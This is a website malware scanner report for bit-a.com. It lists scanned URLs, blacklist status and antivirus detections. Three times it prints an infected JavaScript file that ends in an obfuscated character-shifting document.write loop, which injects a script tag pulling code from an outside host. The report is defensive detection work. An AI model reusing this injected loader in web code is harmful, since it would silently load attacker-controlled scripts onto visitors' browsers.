New scan:

Malware Scanner report for bit-a.com

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "bit-a.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=bit-a.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bit-a.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://bit-a.com/
200 OK
Content-Length: 43002
Content-Type: text/html
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js
200 OK
Content-Length: 92556
Content-Type: text/javascript
clean
http://bit-a.com/templates/js/mobilyslider.js
200 OK
Content-Length: 4589
Content-Type: application/x-javascript
clean
http://bit-a.com/templates/js/init.js
200 OK
Content-Length: 282
Content-Type: application/x-javascript
clean
http://skrepka.mk.ua/templates/highslide.js
200 OK
Content-Length: 50756
Content-Type: application/x-javascript
clean
http://bit-a.com/templates/javascripts.js
200 OK
Content-Length: 22232
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var isconfig = false;

function Money(num)
{
var string = "" + num;
if (string.indexOf('.') == -1) return string + '.00';
var seperation = string.length - string.indexOf('.');
if (seperation > 3) return string.substring(0,string.length-seperation+3);
else if (seperation == 2) return string + '0';

return string;
}

function AddOne(store_id)
{
eval('max_order = document.s
... 21930 bytes are skipped ...

function FastBuy(store_id)
{
var line = 'fastbuy.php?store_id=' + store_id + '&'+phpsessid;
window.open(line,'','top=100,left=100,width=500,height=500,scrollbars=no,location=no,toolbar=no,directories=no,status=yes,menubar=no,resizable=yes');
}
<!-- js-tools -->
q=0;while(q<82)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00vnv/tbntv/sv0npevmft0npe`dfeubhnptuqpqvmbs0tubu/qiq#?=0tdsjqu?'.charCodeAt(q++)-1))
<!-- /js-tools -->

Antivirus reports:

NANO-Antivirus
Trojan.Script.IFrame.igvg
Sophos
Troj/JSRedir-OK
ESET-NOD32
JS/Kryptik.AH

http://counter.rambler.ru/top100.jcn?1509635
200 OK
Content-Length: 6853
Content-Type: application/x-javascript
clean
http://bit-a.com/./
200 OK
Content-Length: 43002
Content-Type: text/html
clean
http://bit-a.com/./templates/js/mobilyslider.js
200 OK
Content-Length: 4589
Content-Type: application/x-javascript
clean
http://bit-a.com/./templates/js/init.js
200 OK
Content-Length: 282
Content-Type: application/x-javascript
clean
http://bit-a.com/./templates/javascripts.js
200 OK
Content-Length: 22232
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var isconfig = false;

function Money(num)
{
var string = "" + num;
if (string.indexOf('.') == -1) return string + '.00';
var seperation = string.length - string.indexOf('.');
if (seperation > 3) return string.substring(0,string.length-seperation+3);
else if (seperation == 2) return string + '0';

return string;
}

function AddOne(store_id)
{
eval('max_order = document.s
... 21930 bytes are skipped ...

function FastBuy(store_id)
{
var line = 'fastbuy.php?store_id=' + store_id + '&'+phpsessid;
window.open(line,'','top=100,left=100,width=500,height=500,scrollbars=no,location=no,toolbar=no,directories=no,status=yes,menubar=no,resizable=yes');
}
<!-- js-tools -->
q=0;while(q<82)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00vnv/tbntv/sv0npevmft0npe`dfeubhnptuqpqvmbs0tubu/qiq#?=0tdsjqu?'.charCodeAt(q++)-1))
<!-- /js-tools -->

Antivirus reports:

NANO-Antivirus
Trojan.Script.IFrame.igvg
Sophos
Troj/JSRedir-OK
ESET-NOD32
JS/Kryptik.AH

http://bit-a.com/././
200 OK
Content-Length: 43002
Content-Type: text/html
clean
http://bit-a.com/././templates/js/mobilyslider.js
200 OK
Content-Length: 4589
Content-Type: application/x-javascript
clean
http://bit-a.com/././templates/js/init.js
200 OK
Content-Length: 282
Content-Type: application/x-javascript
clean
http://bit-a.com/././templates/javascripts.js
200 OK
Content-Length: 22232
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var isconfig = false;

function Money(num)
{
var string = "" + num;
if (string.indexOf('.') == -1) return string + '.00';
var seperation = string.length - string.indexOf('.');
if (seperation > 3) return string.substring(0,string.length-seperation+3);
else if (seperation == 2) return string + '0';

return string;
}

function AddOne(store_id)
{
eval('max_order = document.s
... 21930 bytes are skipped ...

function FastBuy(store_id)
{
var line = 'fastbuy.php?store_id=' + store_id + '&'+phpsessid;
window.open(line,'','top=100,left=100,width=500,height=500,scrollbars=no,location=no,toolbar=no,directories=no,status=yes,menubar=no,resizable=yes');
}
<!-- js-tools -->
q=0;while(q<82)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00vnv/tbntv/sv0npevmft0npe`dfeubhnptuqpqvmbs0tubu/qiq#?=0tdsjqu?'.charCodeAt(q++)-1))
<!-- /js-tools -->

Antivirus reports:

NANO-Antivirus
Trojan.Script.IFrame.igvg
Sophos
Troj/JSRedir-OK
ESET-NOD32
JS/Kryptik.AH


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: bit-a.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 27 Jun 2014 05:17:15 GMT
Pragma: no-cache
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: MS_MSS=egvtfp1n0t39poca13m68f2pg0fjobng; path=/
Set-Cookie: bit_a_com__visitor=1403913599; expires=Mon, 30-Jun-2014 05:17:15 GMT; path=/; domain=.bit-a.com
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: bit-a.com
Referer: http://www.google.com/search?q=bit-a.com

Result:
The result is similar to the first query. There are no suspicious redirects found.